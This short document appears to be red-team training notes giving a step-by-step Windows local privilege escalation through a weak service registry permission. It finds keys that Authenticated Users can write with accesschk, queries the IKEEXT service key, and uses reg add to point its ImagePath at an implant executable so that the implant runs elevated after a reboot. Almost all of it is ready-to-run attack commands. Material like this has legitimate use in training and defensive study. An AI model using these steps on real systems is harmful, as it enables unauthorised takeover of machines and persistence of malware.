First: enumerate write permissions on all service registry keys

accesschk.exe -accepteula -wuvskq "HKLM\System\CurrentControlSet\Services" > c:\rto\regs.txt

Second: open the file and search for the word "Authenticated"

notepad c:\rto\regs.txt

Notice that Authenticated Users have full access to the IKEEXT registry key

Third: let's query that registry key for interesting parameters

reg query HKLM\System\CurrentControlSet\Services\IKEEXT

Fourth: change the ImagePath value to point to our malicious payload

reg add HKLM\SYSTEM\CurrentControlSet\services\IKEEXT /v ImagePath /t REG_EXPAND_SZ /d C:\rto\lpe\implant\implantsrv.exe /f

Now, once the machine is rebooted, the service starts from the modified ImagePath and we will be elevated